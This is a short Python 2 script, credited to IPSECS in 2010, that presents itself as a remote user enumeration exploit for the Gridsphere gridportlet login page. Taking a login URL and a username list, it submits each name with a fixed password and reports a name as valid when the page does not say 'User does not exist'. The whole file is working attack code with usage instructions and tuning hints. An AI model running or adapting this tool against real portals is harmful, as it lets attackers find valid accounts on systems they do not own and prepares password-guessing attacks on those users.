#!/usr/bin/python
# Gridsphere - gridportlet remote user enumeration exploit
# Copyright IPSECS (c) 2010 http://ipsecs.com
# Thanks to underground people who gives idea about python and javascript
# You know who you are :-)

import sys,re,os
from urllib2 import urlopen

#You need to install ClientForm from this site
#http://wwwsearch.sourceforge.net/old/ClientForm
from ClientForm import ParseResponse

def main():
 if len(sys.argv) !=3:
  print "Usage   : python " + sys.argv[0] + " [URL Login] [User List File]"
  print "Example : python " + sys.argv[0] + " https://example.com/acgt/portal?cid=mptoolportlet1 users.txt"
  sys.exit(0);

 response = urlopen(sys.argv[1])
 forms = ParseResponse(response, backwards_compat=False)

 #You have to modify the index in some cases!
 #Try to print what is inside forms[0] forms[1] forms[2] etc
 form = forms[2]

 input = open(sys.argv[2],"r")
 for user in input:
  original_text = form["username"]
  form["username"] = user.rstrip()
  original_text = form["password"]
  form["password"] = "password"
  result = urlopen(form.click()).read()
  igot = re.search("User does not exist",result)
  if igot:
   print "[INVALID] " + user.rstrip() 
  else:
   print "[OK] " + user.rstrip()

if __name__ == '__main__':
 main()